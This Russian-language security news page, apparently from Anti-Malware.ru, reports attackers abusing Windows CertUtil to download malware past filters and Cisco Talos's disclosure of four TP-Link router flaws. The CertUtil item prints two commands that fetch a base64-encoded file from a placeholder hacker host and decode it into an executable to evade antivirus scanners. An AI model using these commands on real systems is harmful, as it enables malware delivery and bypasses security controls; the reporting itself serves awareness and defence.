CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

CertUtil.exe позволяет загружать вредоносные файлы в обход фильтрам

Эксперты в области безопасности обеспокоены использованием киберпреступниками встроенной в Windows программы CertUtil во вредоносных целях. CertUtil предназначена для управления сертификатами в Windows, с помощью этой программы вы можете устанавливать, создавать резервную копию, удалять и управлять хранилищами сертификатов в Windows.

Одной из особенностей CertUtil является возможность загрузить сертификат или любой другой файл по удаленному URL-адресу, сохранив его в виде локального файла. Для этого используется следующий синтаксис: «certutil.exe -urlcache -split -f [URL] output.file».

Еще в 2017 году исследователь Кейси Смит в Twitter выразил обеспокоенность тем, что этот метод можно использовать для загрузки вредоносных программ.

Опасения Смита подтвердились, так как недавно обнаруженный троян с марта этого года использует этот метод для загрузки различных пакетных файлов и сценариев на зараженный компьютер.

В качестве преимущества этого механизма загрузки вредоносных файлов эксперты называют возможность обойти различные фильтры, которые бы не позволили сделать это любой другой программе.

Ксавье Мертенс, консультант по вопросам безопасности, опубликовал свою версию использования CertUtil для загрузки злонамеренного содержимого. Чтобы параллельно обойти антивирусные сканеры, Мертенс предлагает кодировать файл при помощи base64, что позволит представить его как безобидный текст.

После загрузки текстового файла команда «certutil.exe -decode» может использоваться для декодирования файла в исполняемый:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

Более того, некоторые специалисты сообщают о том, что такой метод уже используется киберпреступными группами.

Yandex Zen AMПодписывайтесь на канал "Anti-Malware" в Yandex Zen, чтобы узнавать о новостях и эксклюзивных материалах по информационной безопасности в своей персональной ленте.

Роутеры TP-Link 1GbE затрагивают 4 уязвимости, патчи уже готовы

Исследователи в области кибербезопасности на этой неделе раскрыли детали четырех уязвимостей в маршрутизаторах TP-Link 1GbE. Проблемы безопасности были обнаружены Джаредом Риттлом и Карлом Хердом из Cisco Talos. Все четыре бреши представляют собой классику уязвимостей роутеров.

Одна из проблем — возможность провести DoS-атаку, вторая приводит к утечке файлов, а оставшиеся  бреши открывают возможность для удаленного выполнения кода (RCE).

Если говорить о степени опасности, уязвимости удаленного выполнения кода могут быть использованы только в контексте активной сессии аутентифицированного пользователя. Другими словами, только вошедший злоумышленник или вредоносная программа с необходимыми правами могут эксплуатировать эти дыры.

С другой стороны, баги присутствуют в HTTP-сервере, который используется для предоставления доступа к конфигурационному порталу. То есть он работает с правами root. Таким образом, если злоумышленник сможет использовать бреши удаленного выполнения кода, он получит полный доступ к роутеру в качестве администратора.

Другие две уязвимости не требуют аутентификации для эксплуатации. Во всех четырех случаях атакующему будет необходимо подключиться к порталу управления, однако это обычно доступно любому.

Уязвимыми являются аппаратные версии 2 и 3. В настоящее время выпущено соответствующее обновление прошивки, которое устраняет проблемы безопасности.

Yandex Zen AMПодписывайтесь на канал "Anti-Malware" в Yandex Zen, чтобы узнавать о новостях и эксклюзивных материалах по информационной безопасности в своей персональной ленте.

RSS: Новости на портале Anti-Malware.ru